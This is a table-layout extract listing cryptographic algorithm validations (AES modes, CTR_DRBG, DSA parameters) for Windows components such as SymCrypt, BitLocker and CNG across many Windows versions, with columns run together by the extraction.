OFB ( e/d; 128 , 192 , 256 );
CTR ( int only; 128 , 192 , 256 )
KW ( AE , AD , AES-128 , AES-192 , AES-256 , FWD , 128 , Windows 10 Creators Update (version 1703) Home, Pro,
256 , 192 , 320 , 2048 ) Enterprise, Education, Windows 10 S, Windows 10 Mobile
Cryptography Next Generation (CNG) Implementations
AES Val#4624 #4626
Version 10.0.15063
CCM (KS: 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) Windows 10 Creators Update (version 1703) Home, Pro,
(Payload Length Range: 0 - 32 ( Nonce Length(s): 12 (Tag Enterprise, Education, Windows 10 S, Windows 10 Mobile
Length(s): 16 ) BitLocker(R) Cryptographic Implementations #4625
AES Val#4624 Version 10.0.15063
ECB ( e/d; 128 , 192 , 256 ); Windows 10 Creators Update (version 1703) Home, Pro,
Enterprise, Education, Windows 10 S, Windows 10 Mobile
CBC ( e/d; 128 , 192 , 256 ); SymCrypt Cryptographic Implementations #4624
CFB8 ( e/d; 128 , 192 , 256 ); Version 10.0.15063
CFB128 ( e/d; 128 , 192 , 256 );
CTR ( int only; 128 , 192 , 256 )
CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 ,
2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s):
7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 )
CMAC (Generation/Verification ) (KS: 128; Block Size(s):
Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s)
Min: 16 Max: 16 ) (KS: 192; Block Size(s): Full / Partial ;
Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 16 Max: 16
) (KS: 256; Block Size(s): Full / Partial ; Msg Len(s) Min: 0
Max: 2^16 ; Tag Len(s) Min: 16 Max: 16 )
GCM (KS: AES_128( e/d ) Tag Length(s): 128 120 112 104
96 ) (KS: AES_192( e/d ) Tag Length(s): 128 120 112 104
96 )
(KS: AES_256( e/d ) Tag Length(s): 128 120 112 104 96 )
IV Generated: ( External ) ; PT Lengths Tested: ( 0 , 1024 ,
8 , 1016 ) ; AAD Lengths tested: ( 0 , 1024 , 8 , 1016 ) ;
96BitIV_Supported
GMAC_Supported
XTS( (KS: XTS_128( (e/d) (f) ) KS: XTS_256( (e/d) (f) )
ECB ( e/d; 128 , 192 , 256 ); Windows Embedded Compact Enhanced Cryptographic
Provider (RSAENH) #4434
CBC ( e/d; 128 , 192 , 256 );
Version 7.00.2872
ECB ( e/d; 128 , 192 , 256 ); Windows Embedded Compact Enhanced Cryptographic
CBC ( e/d; 128 , 192 , 256 );
Version 8.00.6246
ECB ( e/d; 128 , 192 , 256 ); Windows Embedded Compact Cryptographic Primitives
Library (bcrypt.dll) #4431
CBC ( e/d; 128 , 192 , 256 );
Version 7.00.2872
CTR ( int only; 128 , 192 , 256 )
ECB ( e/d; 128 , 192 , 256 ); Windows Embedded Compact Cryptographic Primitives
CBC ( e/d; 128 , 192 , 256 );
Version 8.00.6246
CTR ( int only; 128 , 192 , 256 )
CBC ( e/d; 128 , 192 , 256 ); Microsoft Windows 10 Anniversary Update, Windows
Server 2016, Windows Storage Server 2016; Microsoft
CFB128 ( e/d; 128 , 192 , 256 ); Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows
OFB ( e/d; 128 , 192 , 256 ); 10 Anniversary Update Virtual TPM Implementations
#4074
CTR ( int only; 128 , 192 , 256 )
Version 10.0.14393
ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); Microsoft Windows 10 Anniversary Update, Windows
CFB8 ( e/d; 128 , 192 , 256 ); CFB128 ( e/d; 128 , 192 , Server 2016, Windows Storage Server 2016; Microsoft
256 ); CTR ( int only; 128 , 192 , 256 ) Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3
w/ Windows 10 Anniversary Update; Microsoft Lumia 950
CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 , and Lumia 650 w/ Windows 10 Mobile Anniversary
2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): Update SymCrypt Cryptographic Implementations #4064
7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 )
Version 10.0.14393
Min: 0 Max: 16 ) (KS: 192; Block Size(s): Full / Partial ; Msg
Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 0 Max: 16 ) (KS:
256; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max:
2^16 ; Tag Len(s) Min: 0 Max: 16 )
96 )
IV Generated: ( Externally ) ; PT Lengths Tested: ( 0 , 1024
, 8 , 1016 ) ; AAD Lengths tested: ( 0 , 1024 , 8 , 1016 ) ;
IV Lengths Tested: ( 0 , 0 ) ; 96BitIV_Supported
GMAC_Supported
ECB ( e/d; 128 , 192 , 256 ); Microsoft Windows 10 Anniversary Update, Windows Server
2016, Windows Storage Server 2016; Microsoft Surface Book,
CBC ( e/d; 128 , 192 , 256 ); Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10
CFB8 ( e/d; 128 , 192 , 256 ); Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/
Windows 10 Mobile Anniversary Update RSA32 Algorithm
Version 10.0.14393
KW ( AE , AD , AES-128 , AES-192 , AES-256 , FWD , 128 , Microsoft Windows 10 Anniversary Update, Windows
192 , 256 , 320 , 2048 ) Server 2016, Windows Storage Server 2016; Microsoft
Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3
AES Val#4064 w/ Windows 10 Anniversary Update; Microsoft Lumia 950
and Lumia 650 w/ Windows 10 Mobile Anniversary
Update Cryptography Next Generation (CNG)
Version 10.0.14393
CCM (KS: 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) Microsoft Windows 10 Anniversary Update, Windows
(Payload Length Range: 0 - 32 ( Nonce Length(s): 12 (Tag Server 2016, Windows Storage Server 2016; Microsoft
Length(s): 16 ) Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3
AES Val#4064 and Lumia 650 w/ Windows 10 Mobile Anniversary
Update BitLocker® Cryptographic Implementations
#4061
Version 10.0.14393
KW ( AE , AD , AES-128 , AES-192 , AES-256 , FWD , 128 , Microsoft Windows 10 November 2015 Update; Microsoft
256 , 192 , 320 , 2048 ) Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
Surface Pro 2, and Surface Pro w/ Windows 10 November
AES Val#3629 2015 Update; Windows 10 Mobile for Microsoft Lumia
950 and Microsoft Lumia 635; Windows 10 for Microsoft
Surface Hub 84” and Surface Hub 55” Cryptography Next
Version 10.0.10586
CCM (KS: 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) Microsoft Windows 10 November 2015 Update; Microsoft
(Payload Length Range: 0 - 32 ( Nonce Length(s): 12 (Tag Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
Length(s): 16 ) Surface Pro 2, and Surface Pro w/ Windows 10 November
2015 Update; Windows 10 Mobile for Microsoft Lumia
AES Val#3629 950 and Microsoft Lumia 635; Windows 10 for Microsoft
Surface Hub 84” and Surface Hub 55” BitLocker®
Version 10.0.10586
ECB ( e/d; 128 , 192 , 256 ); Microsoft Windows 10 November 2015 Update; Microsoft
Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface
CBC ( e/d; 128 , 192 , 256 ); Pro 2, and Surface Pro w/ Windows 10 November 2015
CFB8 ( e/d; 128 , 192 , 256 ); Update; Windows 10 Mobile for Microsoft Lumia 950 and
Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub
84” and Surface Hub 55” RSA32 Algorithm Implementations
#3630
Version 10.0.10586
ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); Microsoft Windows 10 November 2015 Update; Microsoft
CFB8 ( e/d; 128 , 192 , 256 ); CFB128 ( e/d; 128 , 192 , Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
256 ); CTR ( int only; 128 , 192 , 256 ) Surface Pro 2, and Surface Pro w/ Windows 10 November
CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 , 950 and Microsoft Lumia 635; Windows 10 for Microsoft
2^16 ) (Payload Length Range: 0 - 32 ( Nonce Length(s): Surface Hub 84” and Surface Hub 55” SymCrypt
7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 ) Cryptographic Implementations #3629
Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Version 10.0.10586
2^16 ; Tag Len(s) Min: 0 Max: 16 )
96 )
GMAC_Supported
KW ( AE , AD , AES-128 , AES-192 , AES-256 , FWD , 128 , Microsoft Windows 10 Anniversary Update, Windows
256 , 192 , 320 , 2048 ) Server 2016, Windows Storage Server 2016; Microsoft
AES Val#3497 w/ Windows 10 Anniversary Update; Microsoft Lumia 950
Version 10.0.10240
CCM (KS: 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) Microsoft Windows 10, Microsoft Surface Pro 3 with
(Payload Length Range: 0 - 32 ( Nonce Length(s): 12 (Tag Windows 10, Microsoft Surface 3 with Windows 10,
Length(s): 16 ) Microsoft Surface Pro 2 with Windows 10, Microsoft
Surface Pro with Windows 10 BitLocker® Cryptographic
AES Val#3497 Implementations #3498
Version 10.0.10240
ECB ( e/d; 128 , 192 , 256 ); CBC ( e/d; 128 , 192 , 256 ); Microsoft Windows 10, Microsoft Surface Pro 3 with Windows
CFB8 ( e/d; 128 , 192 , 256 ); CFB128 ( e/d; 128 , 192 , 10, Microsoft Surface 3 with Windows 10, Microsoft Surface
256 ); CTR ( int only; 128 , 192 , 256 ) Pro 2 with Windows 10, Microsoft Surface Pro with Windows
10 SymCrypt Cryptographic Implementations #3497
CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 , Version 10.0.10240
7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 )
CMAC(Generation/Verification ) (KS: 128; Block Size(s):
2^16 ; Tag Len(s) Min: 0 Max: 16 )
96 )
GMAC_Supported
ECB ( e/d; 128 , 192 , 256 ); Microsoft Windows 10, Microsoft Surface Pro 3 with Windows
10, Microsoft Surface 3 with Windows 10, Microsoft Surface
CBC ( e/d; 128 , 192 , 256 ); Pro 2 with Windows 10, Microsoft Surface Pro with Windows
CFB8 ( e/d; 128 , 192 , 256 ); 10 RSA32 Algorithm Implementations #3476
Version 10.0.10240
ECB ( e/d; 128 , 192 , 256 ); Microsoft Windows 8.1, Microsoft Windows Server 2012
R2, Microsoft Windows Storage Server 2012 R2, Microsoft
CBC ( e/d; 128 , 192 , 256 ); Windows RT 8.1, Microsoft Surface with Windows RT 8.1,
CFB8 ( e/d; 128 , 192 , 256 ); Microsoft Surface Pro with Windows 8.1, Microsoft Surface
2, Microsoft Surface Pro 2, Microsoft Surface Pro 3,
Microsoft Windows Phone 8.1, Microsoft Windows
Embedded 8.1 Industry RSA32 Algorithm
Version 6.3.9600
CCM (KS: 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) Microsoft Windows 8.1, Microsoft Windows Server 2012
(Payload Length Range: 0 - 32 ( Nonce Length(s): 12 (Tag R2, Microsoft Windows Storage Server 2012 R2, Microsoft
Length(s): 16 ) Windows RT 8.1, Microsoft Surface with Windows RT 8.1,
Microsoft Surface Pro with Windows 8.1, Microsoft Surface
AES Val#2832 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3,
Embedded 8.1 Industry and Microsoft StorSimple 8100
BitLocker� Cryptographic Implementations #2848
Version 6.3.9600
CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 Windows Storage Server 2012 R2, Microsoft Windows RT
, 2^16 ) (Payload Length Range: 0 - 0 ( Nonce Length(s): 7 8.1, Microsoft Surface with Windows RT 8.1, Microsoft
8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 ) Surface Pro with Windows 8.1, Microsoft Surface 2,
Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft
CMAC (Generation/Verification ) (KS: 128; Block Size(s): Windows Phone 8.1, Microsoft Windows Embedded 8.1
Full / Partial ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Industry and Microsoft StorSimple 8100 SymCrypt
Min: 0 Max: 16 ) (KS: 192; Block Size(s): Full / Partial ; Msg Cryptographic Implementations #2832
256; Block Size(s): Full / Partial ; Msg Len(s) Min: 0 Max: Version 6.3.9600
2^16 ; Tag Len(s) Min: 0 Max: 16 )
96 )
IV Generated: ( Externally ) ; PT Lengths Tested: ( 0 , 128 ,
1024 , 8 , 1016 ) ; AAD Lengths tested: ( 0 , 128 , 1024 , 8
, 1016 ) ; IV Lengths Tested: ( 8 , 1024 ) ;
96BitIV_Supported ;
OtherIVLen_Supported
GMAC_Supported
CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - Windows 8, Windows RT, Windows Server 2012, Surface
0 , 2^16 ) (Payload Length Range: 0 - 32 ( Nonce Windows RT, Surface Windows 8 Pro, and Windows Phone 8
Length(s): 7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 Cryptography Next Generation (CNG) Implementations #2216
14 16 )
AES Val#2197
CMAC (Generation/Verification ) (KS: 128; Block Size(s): ;
Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min: 16 Max:
16 ) (KS: 192; Block Size(s): ; Msg Len(s) Min: 0 Max:
2^16 ; Tag Len(s) Min: 16 Max: 16 ) (KS: 256; Block
Size(s): ; Msg Len(s) Min: 0 Max: 2^16 ; Tag Len(s) Min:
16 Max: 16 )
AES Val#2197
GCM(KS: AES_128( e/d ) Tag Length(s): 128 120 112 104
96 )
, 1024 , 8 , 1016 ) ; AAD Lengths tested: ( 0 , 128 , 1024
, 8 , 1016 ) ; IV Lengths Tested: ( 8 , 1024 ) ;
96BitIV_Supported
GMAC_Supported
CCM (KS: 256 ) (Assoc. Data Len Range: 0 - 0 , 2^16 ) Windows 8, Windows RT, Windows Server 2012, Surface
(Payload Length Range: 0 - 32 ( Nonce Length(s): 12 Windows RT, Surface Windows 8 Pro, and Windows Phone 8
(Tag Length(s): 16 ) BitLocker® Cryptographic Implementations #2198
AES Val#2196
ECB ( e/d; 128 , 192 , 256 ); Windows 8, Windows RT, Windows Server 2012, Surface
Windows RT, Surface Windows 8 Pro, and Windows Phone 8
CBC ( e/d; 128 , 192 , 256 ); Next Generation Symmetric Cryptographic Algorithms
CFB8 ( e/d; 128 , 192 , 256 ); Implementations (SYMCRYPT) #2197
CFB128 ( e/d; 128 , 192 , 256 );

CTR ( int only; 128 , 192 , 256 )
ECB ( e/d; 128 , 192 , 256 ); Windows 8, Windows RT, Windows Server 2012, Surface
CBC ( e/d; 128 , 192 , 256 ); Symmetric Algorithm Implementations (RSA32) #2196
CFB8 ( e/d; 128 , 192 , 256 );
CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 – 0 , Windows Server 2008 R2 and SP1 CNG algorithms #1187
7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 ) Windows 7 Ultimate and SP1 CNG algorithms #1178
AES Val#1168
CCM (KS: 128 , 256 ) (Assoc. Data Len Range: 0 - 8 ) Windows 7 Ultimate and SP1 and Windows Server 2008 R2
(Payload Length Range: 4 - 32 ( Nonce Length(s): 7 8 12 and SP1 BitLocker Algorithm Implementations #1177
13 (Tag Length(s): 4 6 8 14 16 )
AES Val#1168
ECB ( e/d; 128 , 192 , 256 ); Windows 7 and SP1 and Windows Server 2008 R2 and SP1
Symmetric Algorithm Implementation #1168
CBC ( e/d; 128 , 192 , 256 );
CFB8 ( e/d; 128 , 192 , 256 );
GCM Windows 7 and SP1 and Windows Server 2008 R2 and SP1
Symmetric Algorithm Implementation #1168 , vendor-
GMAC affirmed
CCM (KS: 128 , 256 ) (Assoc. Data Len Range: 0 - 8 ) Windows Vista Ultimate SP1 and Windows Server 2008
(Payload Length Range: 4 - 32 ( Nonce Length(s): 7 8 12 BitLocker Algorithm Implementations #760
13 (Tag Length(s): 4 6 8 14 16 )
CCM (KS: 128 , 192 , 256 ) (Assoc. Data Len Range: 0 - 0 , Windows Server 2008 CNG algorithms #757
7 8 9 10 11 12 13 (Tag Length(s): 4 6 8 10 12 14 16 ) Windows Vista Ultimate SP1 CNG algorithms #756
CBC ( e/d; 128 , 256 ); Windows Vista Ultimate BitLocker Drive Encryption #715
CCM (KS: 128 , 256 ) (Assoc. Data Len Range: 0 - 8 ) Windows Vista Ultimate BitLocker Drive Encryption #424
(Payload Length Range: 4 - 32 ( Nonce Length(s): 7 8
12 13 (Tag Length(s): 4 6 8 14 16 )
ECB ( e/d; 128 , 192 , 256 ); Windows Vista Ultimate SP1 and Windows Server 2008
CBC ( e/d; 128 , 192 , 256 );
Windows Vista Symmetric Algorithm Implementation
CFB8 ( e/d; 128 , 192 , 256 ); #553
ECB ( e/d; 128 , 192 , 256 ); Windows Embedded Compact 7 Cryptographic Primitives
CBC ( e/d; 128 , 192 , 256 );
CTR ( int only; 128 , 192 , 256 )
ECB ( e/d; 128 , 192 , 256 ); Windows Embedded Compact 7 Enhanced Cryptographic
CBC ( e/d; 128 , 192 , 256 );
Windows Server 2003 SP2 Enhanced Cryptographic
Windows XP Professional SP3 Enhanced Cryptographic
Windows 2003 SP2 Enhanced Cryptographic Provider
(RSAENH) #548
Windows CE 6.0 and Windows CE 6.0 R2 and Windows
Mobile Enhanced Cryptographic Provider (RSAENH) #516
Windows CE and Windows Mobile 6, 6.1, and 6.5
Enhanced Cryptographic Provider (RSAENH) #507
Windows CE 5.0 and 5.1 Enhanced Cryptographic Provider
(RSAENH) #224
Windows Server 2003 Enhanced Cryptographic Provider
(RSAENH) #80
Windows XP, SP1, and SP2 Enhanced Cryptographic
Deterministic Random Bit Generator (DRBG )
Counter: Microsoft Surface Hub Virtual TPM Implementations

Modes: AES-256 #1734
Derivation Function States: Derivation Function
Version 10.0.15063.674
not used
Prediction Resistance Modes: Not Enabled
Prerequisite: AES #4904
Counter: Windows 10 Home, Pro, Enterprise, Education, Windows

Modes: AES-256 10 S Fall Creators Update and Windows Server, Windows
Derivation Function States: Derivation Function Server Datacenter (version 1709); Virtual TPM
not used Implementations #1733
Prediction Resistance Modes: Not Enabled Version 10.0.16299
Counter: Microsoft Surface Hub SymCrypt Cryptographic
Modes: AES-256 Implementations #1732
Version 10.0.15063.674
used
Counter: Windows 10 Mobile (version 1709) SymCrypt

Modes: AES-256 Cryptographic Implementations #1731
Version 10.0.15254
used

Modes: AES-256 10 S Fall Creators Update and Windows Server, Windows
Derivation Function States: Derivation Function Server Datacenter (version 1709); SymCrypt
used Cryptographic Implementations #1730
Prediction Resistance Modes: Not Enabled Version 10.0.16299
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Windows 10 Creators Update (version 1703) Pro,
BlockCipher_No_df: ( AES-256 ) ( AES Val#4627 ) ] Enterprise, Education Virtual TPM Implementations #1556
Version 10.0.15063
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Windows 10 Creators Update (version 1703) Home, Pro,
BlockCipher_Use_df: ( AES-256 ) ( AES Val#4624 ) ] Enterprise, Education, Windows 10 S, Windows 10 Mobile
SymCrypt Cryptographic Implementations #1555
Version 10.0.15063
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Windows Embedded Compact Enhanced Cryptographic
BlockCipher_No_df: ( AES-256 ) ( AES Val#4434 ) ] Provider (RSAENH) #1433
Version 7.00.2872
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Windows Embedded Compact Enhanced Cryptographic
BlockCipher_No_df: ( AES-256 ) ( AES Val#4433 ) ] Provider (RSAENH) #1432
Version 8.00.6246
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Windows Embedded Compact Cryptographic Primitives
BlockCipher_No_df: ( AES-256 ) ( AES Val#4431 ) ] Library (bcrypt.dll) #1430
Version 7.00.2872
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Windows Embedded Compact Cryptographic Primitives
Version 8.00.6246
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Microsoft Windows 10 Anniversary Update, Windows
BlockCipher_No_df: ( AES-256 ) ( AES Val#4074 ) ] Server 2016, Windows Storage Server 2016; Microsoft
Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows
10 Anniversary Update Virtual TPM Implementations
#1222
Version 10.0.14393
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Microsoft Windows 10 Anniversary Update, Windows
BlockCipher_Use_df: ( AES-256 ) ( AES Val#4064 ) ] Server 2016, Windows Storage Server 2016; Microsoft
Update SymCrypt Cryptographic Implementations #1217
Version 10.0.14393
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Microsoft Windows 10 November 2015 Update; Microsoft
BlockCipher_Use_df: ( AES-256 ) ( AES Val#3629 ) ] Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
Surface Hub and Surface Hub SymCrypt Cryptographic
Version 10.0.10586
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Microsoft Windows 10, Microsoft Surface Pro 3 with
BlockCipher_Use_df: ( AES-256 ) ( AES Val#3497 ) ] Windows 10, Microsoft Surface 3 with Windows 10,
Microsoft Surface Pro 2 with Windows 10, Microsoft
Surface Pro with Windows 10 SymCrypt Cryptographic
Version 10.0.10240
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Windows Storage Server 2012 R2, Microsoft Windows RT
BlockCipher_Use_df: ( AES-256 ) ( AES Val#2832 ) ] 8.1, Microsoft Surface with Windows RT 8.1, Microsoft
Surface Pro with Windows 8.1, Microsoft Surface 2,
Windows Phone 8.1, Microsoft Windows Embedded 8.1
Industry and Microsoft StorSimple 8100 SymCrypt
Version 6.3.9600
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Windows 8, Windows RT, Windows Server 2012, Surface
BlockCipher_Use_df: ( AES-256 ) ( AES Val#2197 ) ] Windows RT, Surface Windows 8 Pro, and Windows Phone 8
Next Generation Symmetric Cryptographic Algorithms
Implementations (SYMCRYPT) #258
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Windows Embedded Compact 7 Cryptographic Primitives
CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; Windows 7 Ultimate and SP1 and Windows Server 2008 R2
BlockCipher_No_df: ( AES-256 ) ( AES Val#1168 ) ] and SP1 RNG Library #23
DRBG (SP 800–90) Windows Vista Ultimate SP1, vendor-affirmed

Digital Signature Algorithm (DSA)
DSA: Microsoft Surface Hub SymCrypt Cryptographic

186-4: Implementations #1303
PQGGen:
Version 10.0.15063.674
L = 2048, N = 256 SHA: SHA-
256
L = 3072, N = 256 SHA: SHA-
256
PQGVer:
L = 2048, N = 256 SHA: SHA-
256
L = 3072, N = 256 SHA: SHA-
256
SigGen:
L = 2048, N = 256 SHA: SHA-
256
L = 3072, N = 256 SHA: SHA-
256
SigVer:
L = 2048, N = 256 SHA: SHA-
256
L = 3072, N = 256 SHA: SHA-
256
KeyPair:
L = 2048, N = 256
L = 3072, N = 256
Prerequisite: SHS #4011, DRBG #1732
DSA: Windows 10 Mobile (version 1709) SymCrypt
186-4: Cryptographic Implementations #1302
PQGGen:
Version 10.0.15254
L = 2048, N = 256 SHA: SHA-
256
L = 3072, N = 256 SHA: SHA-
256
PQGVer:
L = 2048, N = 256 SHA: SHA-
256
L = 3072, N = 256 SHA: SHA-
256
SigGen:
L = 2048, N = 256 SHA: SHA-
256
L = 3072, N = 256 SHA: SHA-
256
SigVer:
L = 2048, N = 256 SHA: SHA-
256
L = 3072, N = 256 SHA: SHA-
256
KeyPair:
L = 2048, N = 256
L = 3072, N = 256
DSA: Windows 10 Home, Pro, Enterprise, Education, Windows

186-4: 10 S Fall Creators Update and Windows Server, Windows
PQGGen: Server Datacenter (version 1709); SymCrypt
L = 2048, N = 256 SHA: SHA- Cryptographic Implementations #1301
256 Version 10.0.16299
L = 3072, N = 256 SHA: SHA-
256
PQGVer:
L = 2048, N = 256 SHA: SHA-
256
L = 3072, N = 256 SHA: SHA-
256
SigGen:
L = 2048, N = 256 SHA: SHA-
256
L = 3072, N = 256 SHA: SHA-
256
SigVer:
L = 2048, N = 256 SHA: SHA-
256
L = 3072, N = 256 SHA: SHA-
256
KeyPair:
L = 2048, N = 256
L = 3072, N = 256
FIPS186-4: Windows 10 Creators Update (version 1703) Home, Pro,
PQG(gen)PARMS TESTED: [ (2048,256)SHA( 256 ); SymCrypt Cryptographic Implementations #1223
(3072,256) SHA( 256 ) ]
Version 10.0.15063
PQG(ver)PARMS TESTED: [ (2048,256) SHA( 256 );
(3072,256) SHA( 256 ) ]
KeyPairGen: [ (2048,256) ; (3072,256) ]
SIG(gen)PARMS TESTED: [ (2048,256) SHA( 256 );
(3072,256) SHA( 256 ); ]
SIG(ver)PARMS TESTED: [ (2048,256) SHA( 256 );
(3072,256) SHA( 256 ) ]
SHS: Val#3790
DRBG: Val# 1555
FIPS186-4: Windows Embedded Compact Cryptographic Primitives

PQG(ver)PARMS TESTED: [ (1024,160) SHA( 1 ); ] Library (bcrypt.dll) #1188
SIG(ver)PARMS TESTED: [ (1024,160) SHA( 1 ); ]
SHS: Val# 3649 Version 7.00.2872

PQG(ver)PARMS TESTED: [ (1024,160) SHA( 1 ); ] Library (bcrypt.dll) #1187
SIG(ver)PARMS TESTED: [ (1024,160) SHA( 1 ); ]
SHS: Val#3648 Version 8.00.6246
FIPS186-4: Microsoft Windows 10 Anniversary Update, Windows

PQG(gen)PARMS TESTED: [ Server 2016, Windows Storage Server 2016; Microsoft
(2048,256)SHA( 256 ); (3072,256) SHA( 256 ) ] Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3
PQG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); w/ Windows 10 Anniversary Update; Microsoft Lumia 950
(3072,256) SHA( 256 ) ] and Lumia 650 w/ Windows 10 Mobile Anniversary
KeyPairGen: [ (2048,256) ; (3072,256) ] Update MsBignum Cryptographic Implementations #1098
SIG(gen)PARMS TESTED: [ (2048,256)
SHA( 256 ); (3072,256) SHA( 256 ); ] Version 10.0.14393
(3072,256) SHA( 256 ) ]
SHS: Val# 3347
DRBG: Val# 1217
FIPS186-4: Microsoft Windows 10 November 2015 Update; Microsoft

PQG(gen)PARMS TESTED: [ (2048,256)SHA( 256 ); Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
(3072,256) SHA( 256 ) ] PQG(ver)PARMS TESTED: [ Surface Pro 2, and Surface Pro w/ Windows 10 November
(2048,256) SHA( 256 ); (3072,256) SHA( 256 )] 2015 Update; Windows 10 Mobile for Microsoft Lumia
KeyPairGen: [ (2048,256) ; (3072,256) ] SIG(gen)PARMS 950 and Microsoft Lumia 635; Windows 10 for Microsoft
TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ); ] Surface Hub 84” and Surface Hub 55” MsBignum
SIG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); Cryptographic Implementations #1024
(3072,256) SHA( 256 ) ]
Version 10.0.10586
SHS: Val# 3047
DRBG: Val# 955
FIPS186-4: Microsoft Windows 10, Microsoft Surface Pro 3 with
PQG(gen)PARMS TESTED: [ (2048,256)SHA( 256 ); Windows 10, Microsoft Surface 3 with Windows 10,
(3072,256) SHA( 256 ) ] Microsoft Surface Pro 2 with Windows 10, Microsoft
PQG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); Surface Pro with Windows 10 MsBignum Cryptographic
(3072,256) SHA( 256 ) ] Implementations #983
KeyPairGen: [ (2048,256) ; (3072,256) ]
SIG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); Version 10.0.10240
(3072,256) SHA( 256 ); ] SIG(ver)PARMS TESTED: [
(2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
SHS: Val# 2886
DRBG: Val# 868
FIPS186-4: Microsoft Windows 8.1, Microsoft Windows Server 2012

PQG(gen)PARMS TESTED: [ R2, Microsoft Windows Storage Server 2012 R2, Microsoft
(2048,256)SHA( 256 ); (3072,256) SHA( 256 ) ] Windows RT 8.1, Microsoft Surface with Windows RT 8.1,
PQG(ver)PARMS TESTED: [ (2048,256) Microsoft Surface Pro with Windows 8.1, Microsoft Surface
SHA( 256 ); (3072,256) SHA( 256 ) ] 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3,
KeyPairGen: [ (2048,256) ; (3072,256) ] Microsoft Windows Phone 8.1, Microsoft Windows
SIG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); Embedded 8.1 Industry and Microsoft StorSimple 8100
(3072,256) SHA( 256 ); ] MsBignum Cryptographic Implementations #855
(3072,256) SHA( 256 ) ] Version 6.3.9600
SHS: Val# 2373

DRBG: Val# 489
FIPS186-2: Windows 8, Windows RT, Windows Server 2012, Surface

PQG(ver) MOD(1024); Windows RT, Surface Windows 8 Pro, and Windows Phone 8
SIG(ver) MOD(1024); Cryptography Next Generation (CNG) Implementations #687
SHS: #1903
DRBG: #258
FIPS186-4:
PQG(gen)PARMS TESTED: [ (2048,256)SHA( 256 );
(3072,256) SHA( 256 ) ]
PQG(ver)PARMS TESTED: [ (2048,256) SHA( 256 );
(3072,256) SHA( 256 ) ]
SIG(gen)PARMS TESTED: [ (2048,256) SHA( 256 );
(3072,256) SHA( 256 ); ]
(3072,256) SHA( 256 ) ]
SHS: #1903
DRBG: #258
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical
DSA List Val#687.

PQG(ver) MOD(1024); Windows RT, Surface Windows 8 Pro, and Windows Phone 8
SIG(ver) MOD(1024); DSS and Diffie-Hellman Enhanced Cryptographic Provider
SHS: #1902 (DSSENH) #686
DRBG: #258
compliant per the SP800-131A transition. See Historical DSA
List Val#686.
